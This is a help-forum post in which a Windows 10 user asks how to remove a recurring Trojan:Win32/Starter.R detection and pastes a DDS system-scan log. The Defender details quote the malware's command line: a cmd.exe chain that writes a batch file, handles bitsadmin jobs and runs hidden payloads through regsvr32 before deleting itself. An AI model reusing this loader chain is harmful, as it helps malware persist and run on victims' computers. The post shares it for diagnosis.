
Trojan:Win32/Starter.R

Defender finds the threat Trojan:Win32/Starter.R about 3-4x a day. Each time I remove it, but a while later it hits on it again. I've also run Malwarebytes and removed it with it several times, but it still apparently shows back up. When I was searching online for info on it, I saw several sites saying it can be easy to permanently remove, BUT by using their program. I don't trust just every program that boasts being a legit virus remover. Needless to say, I figured I'd come here ('cause I know to trust any program you may recommend, if needed).
Thank you for your time and assistance.

P.S. I don't think I have easy access to a Windows boot CD.

THIS IS WHAT "DETAILS" DEFENDER GIVES EACH TIME IT NOTIFIES ME OF IT

Trojan:Win32/Starter.R
CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /complete 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /cancel 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo if exist "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" goto q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\89331b0d-24f7-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\%i" >> "C:\ProgramData\89331b0d-24f7-1\x.bat")) > nul & echo :q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo del "C:\ProgramData\89331b0d-24f7-1\x.bat" ^& exit >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & "C:\ProgramData\89331b0d-24f7-1\x.bat""






DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.17134.1
Run by Christopher&Gabriell at 20:04:03 on 2018-10-09
Microsoft Windows 10 Home 10.0.17134.0.1252.1.1033.18.3554.1271 [GMT -5:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\svchost.exe -k RPCSS -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs -p
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\system32\atiesrxx.exe
C:\WINDOWS\system32\atieclxx.exe
C:\WINDOWS\system32\svchost.exe -k LocalService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Program Files\IDT\WDM\STacSV64.exe
C:\WINDOWS\system32\svchost.exe -k appmodel -p
C:\WINDOWS\System32\svchost.exe -k NetworkService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\Hpservice.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\WINDOWS\system32\svchost.exe -k apphost
C:\WINDOWS\System32\svchost.exe -k utcsvc -p
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Core Temp\Core Temp.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
C:\Windows\System32\CastSrv.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Program Files\Windows Defender\MSASCuiL.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
C:\WINDOWS\system32\osk.exe
C:\Program Files\WindowsApps\Microsoft.WindowsStore_11809.1001.8.0_x64__8wekyb3d8bbwe\WinStore.App.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18081.14710.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera_crashreporter.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
C:\WINDOWS\SysWOW64\DllHost.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
C:\WINDOWS\system32\browser_broker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\Windows.WARP.JITService.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
svchost.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uLocal Page = %11%\blank.htm
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
uRun: [WinPatrol] C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe
mRun: [HP CoolSense] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe -byrunkey
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: EnableFullTrustStartupTasks = dword:2
mPolicies-System: EnableUwpStartupTasks = dword:2
mPolicies-System: SupportFullTrustStartupTasks = dword:1
mPolicies-System: SupportUwpStartupTasks = dword:1
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~1\Office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~1\MICROS~1\Office16\ONBttnIE.dll/105
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://www.pcpitstop.com/nirvana/controls/pcmatic.cab
TCP: Interfaces\{982D5C35-5D95-44B3-84D9-0D16030AAD83} : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-Run: [SecurityHealth] C:\Program Files (x86)\Windows Defender\MSASCuiL.exe
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: EnableFullTrustStartupTasks = dword:2
x64-mPolicies-System: EnableUwpStartupTasks = dword:2
x64-mPolicies-System: SupportFullTrustStartupTasks = dword:1
x64-mPolicies-System: SupportUwpStartupTasks = dword:1
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office16\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office16\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
x64-Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\68.0.3440.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2018-4-11 177192]
R0 iorate;Disk I/O Rate Filter Driver;C:\WINDOWS\System32\drivers\iorate.sys [2018-4-11 58272]
R0 SgrmAgent;System Guard Runtime Monitor Agent;C:\WINDOWS\System32\drivers\SgrmAgent.sys [2018-4-11 63896]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2018-4-11 16288]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2018-8-17 72768]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2018-4-11 18472]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2018-4-11 209816]
R1 afunix;afunix;C:\WINDOWS\System32\drivers\afunix.sys [2018-4-11 39424]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2018-4-11 254464]
R1 bam;Background Activity Moderator Driver;C:\WINDOWS\System32\drivers\bam.sys [2018-4-11 60320]
R1 CLVirtualDrive;CLVirtualDrive;C:\WINDOWS\System32\drivers\CLVirtualDrive.sys [2018-8-16 92536]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2018-4-11 55808]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2018-4-11 8192]
R2 AMD External Events Utility;AMD External Events Utility;C:\WINDOWS\System32\atiesrxx.exe [2014-9-15 257032]
R2 AMD FUEL Service;AMD FUEL Service;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2014-9-15 344064]
R2 AODDriver4.3;AODDriver4.3;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
R2 APXACC;AppEx Networks Accelerator LWF;C:\WINDOWS\System32\drivers\appexDrv.sys [2018-9-20 228032]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R2 CldFlt;Windows Cloud Files Filter Driver;C:\WINDOWS\System32\drivers\cldflt.sys [2018-8-17 414720]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork -p [2018-4-11 51288]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc -p [2018-4-11 51288]
R2 DusmSvc;Data Usage;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R2 hpsrv;HP Service;C:\WINDOWS\System32\hpservice.exe [2012-9-24 31040]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-11-21 333688]
R2 HPWMISVC;HPWMISVC;C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [2012-9-7 35232]
R2 IconMan_R;IconMan_R;C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2018-9-21 2451456]
R2 SecurityHealthService;Windows Defender Security Center Service;C:\WINDOWS\System32\SecurityHealthService.exe [2018-8-17 760888]
R2 SgrmBroker;System Guard Runtime Monitor Broker;C:\WINDOWS\System32\SgrmBroker.exe [2018-4-11 163336]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2018-4-11 82432]
R2 SynTPEnhService;SynTPEnh Caller Service;C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2016-4-28 253960]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2018-4-11 151960]
R3 ALSysIO;ALSysIO;C:\Users\CHRIST~1\AppData\Local\Temp\ALSysIO64.sys [2018-8-20 46384]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\WINDOWS\System32\drivers\AtihdWT6.sys [2017-11-17 111112]
R3 CAD;Charge Arbitration Driver;C:\WINDOWS\System32\drivers\CAD.sys [2018-4-11 60320]
R3 camsvc;Capability Access Manager Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2018-4-11 20992]
R3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 RSP2STOR;Realtek PCIE CardReader Driver - P2;C:\WINDOWS\System32\drivers\RtsP2Stor.sys [2018-8-16 310528]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2018-4-11 604160]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 TokenBroker;Web Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 usbfilter;AMD USB Filter Driver;C:\WINDOWS\System32\drivers\usbfilter.sys [2018-8-16 58536]
R3 WarpJITSvc;WarpJITSvc;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
R3 WdNisDrv;Windows Defender Antivirus Network Inspection System Driver;C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [2018-9-25 60584]
R3 WirelessButtonDriver64;HP Wireless Button Driver Service;C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [2018-5-11 34944]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2018-4-11 20480]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2018-4-11 1135520]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 amd_sata;amd_sata;C:\WINDOWS\System32\drivers\amd_sata.sys [2012-9-2 79528]
S3 amd_xata;amd_xata;C:\WINDOWS\System32\drivers\amd_xata.sys [2012-9-2 26280]
S3 amdkmafd;AMD Audio Bus Lower Filter;C:\WINDOWS\System32\drivers\amdkmafd.sys [2012-9-22 21160]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2018-4-11 18432]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness -p [2018-4-11 51288]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2018-4-11 9728]
S3 bindflt;Windows Bind Filter Driver;C:\WINDOWS\System32\drivers\bindflt.sys [2018-4-11 92056]
S3 BTAGService;Bluetooth Audio Gateway Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
S3 BthAvctpSvc;AVCTP service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 bttflt;Microsoft Hyper-V VHDPMEM BTT Filter;C:\WINDOWS\System32\drivers\bttflt.sys [2018-4-11 38304]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2018-4-11 39936]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2018-4-11 123392]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2018-4-11 321432]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2018-4-11 1836952]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2018-8-17 90624]
S3 diagsvc;Diagnostic Execution Service;C:\WINDOWS\System32\svchost.exe -k diagnostics [2018-4-11 51288]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2018-4-11 51288]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2018-4-11 20992]
S3 GraphicsPerfSvc;GraphicsPerfSvc;C:\WINDOWS\System32\svchost.exe -k GraphicsPerfSvcGroup [2018-4-11 51288]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2018-4-11 50592]
S3 hpqcaslwmiex;HP CASL Framework Service;C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [2016-6-4 1031704]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver;C:\WINDOWS\System32\drivers\mshwnclx.sys [2018-4-11 27136]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2018-4-11 36864]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2018-4-11 91648]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2018-4-11 79360]
S3 iaLPSS2i_GPIO2_BXT_P;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys [2018-4-11 88576]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2018-4-11 171520]
S3 iaLPSS2i_I2C_BXT_P;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys [2018-4-11 174592]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2018-4-11 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2018-4-11 113152]
S3 iaStorA;iaStorA;C:\WINDOWS\System32\drivers\iaStorA.sys [2012-9-28 650808]
S3 iaStorAVC;Intel Chipset SATA RAID Controller;C:\WINDOWS\System32\drivers\iaStorAVC.sys [2018-4-11 885144]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2018-4-11 526232]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2018-4-11 38912]
S3 InstallService;Microsoft Store Install Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 IPT;IPT;C:\WINDOWS\System32\drivers\ipt.sys [2018-4-11 32256]
S3 IpxlatCfgSvc;IP Translation Configuration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 ItSas35i;ItSas35i;C:\WINDOWS\System32\drivers\ItSas35i.sys [2018-4-11 145816]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2018-4-11 124312]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2018-4-11 128408]
S3 LxpSvc;Language Experience Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2018-4-11 51288]
S3 mausbhost;MA-USB Host Controller Driver;C:\WINDOWS\System32\drivers\mausbhost.sys [2018-4-11 505240]
S3 mausbip;MA-USB IP Filter Driver;C:\WINDOWS\System32\drivers\mausbip.sys [2018-4-11 56736]
S3 MBAMService;Malwarebytes Service;C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [2018-8-29 6541008]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2018-4-11 75160]
S3 megasas35i;megasas35i;C:\WINDOWS\System32\drivers\megasas35i.sys [2018-4-11 82328]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2018-4-11 842648]
S3 NaturalAuthentication;Natural Authentication;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2018-4-11 108952]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2018-4-11 175104]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2018-4-11 197632]
S3 nvdimm;Microsoft NVDIMM device driver;C:\WINDOWS\System32\drivers\nvdimm.sys [2018-4-11 104448]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE [2018-6-13 253640]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2018-4-11 58776]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2018-4-11 61848]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 PNPMEM;Microsoft Memory Module Driver;C:\WINDOWS\System32\drivers\pnpmem.sys [2018-4-11 16896]
S3 PushToInstall;Windows PushToInstall Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
